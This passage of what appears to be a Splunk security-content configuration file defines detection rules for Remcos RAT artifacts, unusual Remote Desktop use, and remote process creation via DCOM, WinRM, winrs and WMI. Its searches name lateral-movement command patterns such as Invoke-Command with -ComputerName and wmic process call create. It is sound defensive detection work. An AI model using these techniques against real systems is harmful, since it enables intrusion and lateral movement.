conjunction with other security measures and threat intelligence to ensure accurate detection and response.
action.notable.param.rule_title = Remcos client registry install entry
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) AS firstTime max(_time) AS lastTime FROM datamodel=Endpoint.Processes BY _time span=1h Processes.user Processes.process_id Processes.process_name Processes.process Processes.process_path Processes.dest Processes.parent_process_name Processes.parent_process Processes.process_guid | `drop_dm_object_name(Processes)` | join process_guid [ | tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_key_name=*\\Software\\Remcos*) BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)`] | fields firstTime lastTime dest user parent_process_name parent_process process_name process_path process registry_key_name registry_path registry_value_name registry_value_data process_guid | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `remcos_client_registry_install_entry_filter`

[ESCU - Remcos RAT File Creation in Remcos Folder - Rule]
action.escu = 0
action.escu.enabled = 1
description = This search detects file creation in the Remcos folder under AppData, which holds the keylog and clipboard logs that will be sent to its C2 server. This is a good TTP indicator that a Remcos RAT is present on the system and performing keylogging, clipboard grabbing and audio recording.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1113"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = This search detects file creation in the Remcos folder under AppData, which holds the keylog and clipboard logs that will be sent to its C2 server. This is a good TTP indicator that a Remcos RAT is present on the system and performing keylogging, clipboard grabbing and audio recording.
action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the process name, parent process, and command-line executions from your endpoints. If you are using Sysmon, you must have at least version 6.0.4 of the Sysmon TA.
action.escu.known_false_positives = unknown
action.escu.creation_date = 2021-09-21
action.escu.modification_date = 2021-09-21
action.escu.confidence = high
action.escu.full_search_name = ESCU - Remcos RAT File Creation in Remcos Folder - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Remcos"]
action.risk = 1
action.risk.param._risk_message = file $file_name$ created in $file_path$ of $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 100}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Remcos RAT File Creation in Remcos Folder - Rule
action.correlationsearch.annotations = {"analytic_story": ["Remcos"], "cis20": ["CIS 10"], "confidence": 100, "impact": 100, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1113"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This search detects file creation in the Remcos folder under AppData, which holds the keylog and clipboard logs that will be sent to its C2 server. This is a good TTP indicator that a Remcos RAT is present on the system and performing keylogging, clipboard grabbing and audio recording.
action.notable.param.rule_title = Remcos RAT File Creation in Remcos Folder
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Filesystem where Filesystem.file_name IN ("*.dat") Filesystem.file_path = "*\\remcos\\*" by _time Filesystem.file_name Filesystem.file_path Filesystem.dest Filesystem.file_create_time | `drop_dm_object_name(Filesystem)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `remcos_rat_file_creation_in_remcos_folder_filter`

[ESCU - Remote Desktop Process Running On System - Rule]
action.escu = 0
action.escu.enabled = 1
description = **WARNING**, this detection is marked **EXPERIMENTAL** by the Splunk Threat Research Team. This means that the detection has been manually tested but we do not have the associated attack data to perform automated testing or cannot share this attack dataset due to its sensitive nature. If you have any questions feel free to email us at: research@splunk.com. This search looks for the remote desktop process mstsc.exe running on systems upon which it doesn't typically run. This is accomplished by filtering out all systems that are noted in the `common_rdp_source category` in the Assets and Identity framework.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1021.001", "T1021"], "nist": ["DE.AE"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = This search looks for the remote desktop process mstsc.exe running on systems upon which it doesn't typically run. This is accomplished by filtering out all systems that are noted in the `common_rdp_source category` in the Assets and Identity framework.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = Remote Desktop may be used legitimately by users on the network.
action.escu.creation_date = 2020-07-21
action.escu.modification_date = 2020-07-21
action.escu.confidence = high
action.escu.full_search_name = ESCU - Remote Desktop Process Running On System - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Hidden Cobra Malware", "Active Directory Lateral Movement"]
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Experimental - Remote Desktop Process Running On System - Rule
action.correlationsearch.annotations = {"analytic_story": ["Hidden Cobra Malware", "Active Directory Lateral Movement"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1021.001", "T1021"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process=*mstsc.exe AND Processes.dest_category!=common_rdp_source by Processes.dest Processes.user Processes.process | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `drop_dm_object_name(Processes)` | `remote_desktop_process_running_on_system_filter`

[ESCU - Remote Process Instantiation via DCOM and PowerShell - Rule]
action.escu = 0
action.escu.enabled = 1
description = This analytic looks for the execution of `powershell.exe` with arguments utilized to start a process on a remote endpoint by abusing the DCOM protocol. Specifically, this search looks for the abuse of ShellExecute and ExecuteShellCommand. Red Teams and adversaries alike may abuse DCOM and `powershell.exe` for lateral movement and remote code execution.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1021", "T1021.003"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = This analytic looks for the execution of `powershell.exe` with arguments utilized to start a process on a remote endpoint by abusing the DCOM protocol. Specifically, this search looks for the abuse of ShellExecute and ExecuteShellCommand. Red Teams and adversaries alike may abuse DCOM and `powershell.exe` for lateral movement and remote code execution.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = Administrators may leverage DCOM to start a process on remote systems, but this activity is usually limited to a small set of hosts or users.
action.escu.creation_date = 2021-11-15
action.escu.modification_date = 2021-11-15
action.escu.confidence = high
action.escu.full_search_name = ESCU - Remote Process Instantiation via DCOM and PowerShell - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Active Directory Lateral Movement"]
action.risk = 1
action.risk.param._risk_message = A process was started on a remote endpoint from $dest$ by abusing DCOM using PowerShell.exe
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 63}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Remote Process Instantiation via DCOM and PowerShell - Rule
action.correlationsearch.annotations = {"analytic_story": ["Active Directory Lateral Movement"], "cis20": ["CIS 10"], "confidence": 70, "impact": 90, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1021", "T1021.003"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This analytic looks for the execution of `powershell.exe` with arguments utilized to start a process on a remote endpoint by abusing the DCOM protocol. Specifically, this search looks for the abuse of ShellExecute and ExecuteShellCommand. Red Teams and adversaries alike may abuse DCOM and `powershell.exe` for lateral movement and remote code execution.
action.notable.param.rule_title = Remote Process Instantiation via DCOM and PowerShell
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_powershell` (Processes.process="*Document.ActiveView.ExecuteShellCommand*" OR Processes.process="*Document.Application.ShellExecute*") by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `remote_process_instantiation_via_dcom_and_powershell_filter`

[ESCU - Remote Process Instantiation via DCOM and PowerShell Script Block - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of PowerShell with arguments utilized to start a process on a remote endpoint by abusing the DCOM protocol. Specifically, this search looks for the abuse of ShellExecute and ExecuteShellCommand. Red Teams and adversaries alike may abuse DCOM for lateral movement and remote code execution.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1021", "T1021.003"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of PowerShell with arguments utilized to start a process on a remote endpoint by abusing the DCOM protocol. Specifically, this search looks for the abuse of ShellExecute and ExecuteShellCommand. Red Teams and adversaries alike may abuse DCOM for lateral movement and remote code execution.
action.escu.how_to_implement = To successfully implement this analytic, you will need to enable PowerShell Script Block Logging on some or all endpoints. Additional setup instructions can be found at https://docs.splunk.com/Documentation/UBA/5.0.4.1/GetDataIn/AddPowerShell#Configure_module_logging_for_PowerShell.
action.escu.known_false_positives = Administrators may leverage DCOM to start a process on remote systems, but this activity is usually limited to a small set of hosts or users.
action.escu.creation_date = 2022-03-22
action.escu.modification_date = 2022-03-22
action.escu.confidence = high
action.escu.full_search_name = ESCU - Remote Process Instantiation via DCOM and PowerShell Script Block - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Microsoft Windows"]
action.escu.analytic_story = ["Active Directory Lateral Movement"]
action.risk = 1
action.risk.param._risk_message = A process was started on a remote endpoint from $Computer$ by abusing DCOM using PowerShell.exe
action.risk.param._risk = [{"risk_object_field": "Computer", "risk_object_type": "system", "risk_score": 63}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Remote Process Instantiation via DCOM and PowerShell Script Block - Rule
action.correlationsearch.annotations = {"analytic_story": ["Active Directory Lateral Movement"], "cis20": ["CIS 10"], "confidence": 70, "impact": 90, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1021", "T1021.003"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of PowerShell with arguments utilized to start a process on a remote endpoint by abusing the DCOM protocol. Specifically, this search looks for the abuse of ShellExecute and ExecuteShellCommand. Red Teams and adversaries alike may abuse DCOM for lateral movement and remote code execution.
action.notable.param.rule_title = Remote Process Instantiation via DCOM and PowerShell Script Block
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `powershell` EventCode=4104 (ScriptBlockText="*Document.Application.ShellExecute*" OR ScriptBlockText="*Document.ActiveView.ExecuteShellCommand*") | stats count min(_time) as firstTime max(_time) as lastTime by EventCode ScriptBlockText Computer user_id | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `remote_process_instantiation_via_dcom_and_powershell_script_block_filter`

[ESCU - Remote Process Instantiation via WinRM and PowerShell - Rule]
action.escu = 0
action.escu.enabled = 1
description = This analytic looks for the execution of `powershell.exe` with arguments utilized to start a process on a remote endpoint by abusing the WinRM protocol. Specifically, this search looks for the abuse of the `Invoke-Command` commandlet. Red Teams and adversaries alike may abuse WinRM and `powershell.exe` for lateral movement and remote code execution.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1021", "T1021.006"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = This analytic looks for the execution of `powershell.exe` with arguments utilized to start a process on a remote endpoint by abusing the WinRM protocol. Specifically, this search looks for the abuse of the `Invoke-Command` commandlet. Red Teams and adversaries alike may abuse WinRM and `powershell.exe` for lateral movement and remote code execution.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = Administrators may leverage WinRM and `Invoke-Command` to start a process on remote systems for system administration or automation use cases. However, this activity is usually limited to a small set of hosts or users.
action.escu.creation_date = 2021-11-16
action.escu.modification_date = 2021-11-16
action.escu.confidence = high
action.escu.full_search_name = ESCU - Remote Process Instantiation via WinRM and PowerShell - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Active Directory Lateral Movement"]
action.risk = 1
action.risk.param._risk_message = A process was started on a remote endpoint from $dest$ by abusing WinRM using PowerShell.exe
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 45}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Remote Process Instantiation via WinRM and PowerShell - Rule
action.correlationsearch.annotations = {"analytic_story": ["Active Directory Lateral Movement"], "cis20": ["CIS 10"], "confidence": 50, "impact": 90, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1021", "T1021.006"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This analytic looks for the execution of `powershell.exe` with arguments utilized to start a process on a remote endpoint by abusing the WinRM protocol. Specifically, this search looks for the abuse of the `Invoke-Command` commandlet. Red Teams and adversaries alike may abuse WinRM and `powershell.exe` for lateral movement and remote code execution.
action.notable.param.rule_title = Remote Process Instantiation via WinRM and PowerShell action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_powershell` (Processes.process="*Invoke-Command*" AND Processes.process="*-ComputerName*") by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `remote_process_instantiation_via_winrm_and_powershell_filter` [ESCU - Remote Process Instantiation via WinRM and PowerShell Script Block - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of PowerShell with arguments utilized to start a process on a remote endpoint by abusing the WinRM protocol. Specifically, this search looks for the abuse of the `Invoke-Command` commandlet. Red Teams and adversaries alike may abuse WinRM for lateral movement and remote code execution. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1021", "T1021.006"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of PowerShell with arguments utilized to start a process on a remote endpoint by abusing the WinRM protocol. Specifically, this search looks for the abuse of the `Invoke-Command` commandlet. 
Red Teams and adversaries alike may abuse WinRM for lateral movement and remote code execution. action.escu.how_to_implement = To successfully implement this analytic, you will need to enable PowerShell Script Block Logging on some or all endpoints. Additional setup instructions can be found https://docs.splunk.com/Documentation/UBA/5.0.4.1/GetDataIn/AddPowerShell#Configure_module_logging_for_PowerShell. action.escu.known_false_positives = Administrators may leverage WinRM and `Invoke-Command` to start a process on remote systems for system administration or automation use cases. This activity is usually limited to a small set of hosts or users. In certain environments, tuning may not be possible. action.escu.creation_date = 2022-03-22 action.escu.modification_date = 2022-03-22 action.escu.confidence = high action.escu.full_search_name = ESCU - Remote Process Instantiation via WinRM and PowerShell Script Block - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Active Directory Lateral Movement"] action.risk = 1 action.risk.param._risk_message = A process was started on a remote endpoint from $Computer$ by abusing WinRM using PowerShell.exe action.risk.param._risk = [{"risk_object_field": "Computer", "risk_object_type": "system", "risk_score": 45}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Remote Process Instantiation via WinRM and PowerShell Script Block - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Lateral Movement"], "cis20": ["CIS 10"], "confidence": 50, "impact": 90, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1021", "T1021.006"], "nist": ["DE.CM"]} 
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify the execution of PowerShell with arguments utilized to start a process on a remote endpoint by abusing the WinRM protocol. Specifically, this search looks for the abuse of the `Invoke-Command` commandlet. Red Teams and adversaries alike may abuse WinRM for lateral movement and remote code execution.
action.notable.param.rule_title = Remote Process Instantiation via WinRM and PowerShell Script Block
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `powershell` EventCode=4104 (ScriptBlockText="*Invoke-Command*" AND ScriptBlockText="*-ComputerName*") | stats count min(_time) as firstTime max(_time) as lastTime by EventCode ScriptBlockText Computer user_id | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `remote_process_instantiation_via_winrm_and_powershell_script_block_filter`

[ESCU - Remote Process Instantiation via WinRM and Winrs - Rule]
action.escu = 0
action.escu.enabled = 1
description = This analytic looks for the execution of `winrs.exe` with command-line arguments utilized to start a process on a remote endpoint. Red Teams and adversaries alike may abuse the WinRM protocol and this binary for lateral movement and remote code execution.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1021", "T1021.006"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = This analytic looks for the execution of `winrs.exe` with command-line arguments utilized to start a process on a remote endpoint. Red Teams and adversaries alike may abuse the WinRM protocol and this binary for lateral movement and remote code execution.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = Administrators may leverage WinRM and Winrs to start a process on remote systems, but this activity is usually limited to a small set of hosts or users.
action.escu.creation_date = 2021-11-11
action.escu.modification_date = 2021-11-11
action.escu.confidence = high
action.escu.full_search_name = ESCU - Remote Process Instantiation via WinRM and Winrs - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Active Directory Lateral Movement"]
action.risk = 1
action.risk.param._risk_message = A process was started on a remote endpoint from $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 54}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Remote Process Instantiation via WinRM and Winrs - Rule
action.correlationsearch.annotations = {"analytic_story": ["Active Directory Lateral Movement"], "cis20": ["CIS 10"], "confidence": 60, "impact": 90, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1021", "T1021.006"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This analytic looks for the execution of `winrs.exe` with command-line arguments utilized to start a process on a remote endpoint. Red Teams and adversaries alike may abuse the WinRM protocol and this binary for lateral movement and remote code execution.
action.notable.param.rule_title = Remote Process Instantiation via WinRM and Winrs
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name=winrs.exe OR Processes.original_file_name=winrs.exe) (Processes.process="*-r:*" OR Processes.process="*-remote:*") by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `remote_process_instantiation_via_winrm_and_winrs_filter`

[ESCU - Remote Process Instantiation via WMI - Rule]
action.escu = 0
action.escu.enabled = 1
description = This analytic identifies wmic.exe being launched with parameters to spawn a process on a remote system. Red Teams and adversaries alike may abuse WMI and this binary for lateral movement and remote code execution.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1047"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = This analytic identifies wmic.exe being launched with parameters to spawn a process on a remote system. Red Teams and adversaries alike may abuse WMI and this binary for lateral movement and remote code execution.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = The wmic.exe utility is a benign Windows application. It may be used legitimately by Administrators with these parameters for remote system administration, but it's relatively uncommon.
action.escu.creation_date = 2023-12-27
action.escu.modification_date = 2023-12-27
action.escu.confidence = high
action.escu.full_search_name = ESCU - Remote Process Instantiation via WMI - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Ransomware", "CISA AA23-347A", "Active Directory Lateral Movement", "Suspicious WMI Use"]
action.risk = 1
action.risk.param._risk_message = A wmic.exe process $process$ containing a remote process spawn command line was observed on host $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 49}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 49}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Remote Process Instantiation via WMI - Rule
action.correlationsearch.annotations = {"analytic_story": ["Ransomware", "CISA AA23-347A", "Active Directory Lateral Movement", "Suspicious WMI Use"], "cis20": ["CIS 10"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1047"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This analytic identifies wmic.exe being launched with parameters to spawn a process on a remote system. Red Teams and adversaries alike may abuse WMI and this binary for lateral movement and remote code execution.
action.notable.param.rule_title = Remote Process Instantiation via WMI
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_wmic` (Processes.process="*/node:*" AND Processes.process="*process*" AND Processes.process="*call*" AND Processes.process="*create*") by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `remote_process_instantiation_via_wmi_filter`

[ESCU - Remote Process Instantiation via WMI and PowerShell - Rule]
action.escu = 0
action.escu.enabled = 1
description = This analytic looks for the execution of `powershell.exe` leveraging the `Invoke-WmiMethod` commandlet complemented with arguments utilized to start a process on a remote endpoint by abusing WMI. Red Teams and adversaries alike may abuse WMI and `powershell.exe` for lateral movement and remote code execution.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1047"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = This analytic looks for the execution of `powershell.exe` leveraging the `Invoke-WmiMethod` commandlet complemented with arguments utilized to start a process on a remote endpoint by abusing WMI. Red Teams and adversaries alike may abuse WMI and `powershell.exe` for lateral movement and remote code execution.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = Administrators may leverage WMI and powershell.exe to start a process on remote systems, but this activity is usually limited to a small set of hosts or users.
action.escu.creation_date = 2021-11-15
action.escu.modification_date = 2021-11-15
action.escu.confidence = high
action.escu.full_search_name = ESCU - Remote Process Instantiation via WMI and PowerShell - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Active Directory Lateral Movement"]
action.risk = 1
action.risk.param._risk_message = A process was started on a remote endpoint from $dest$ by abusing WMI using PowerShell.exe
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 63}]
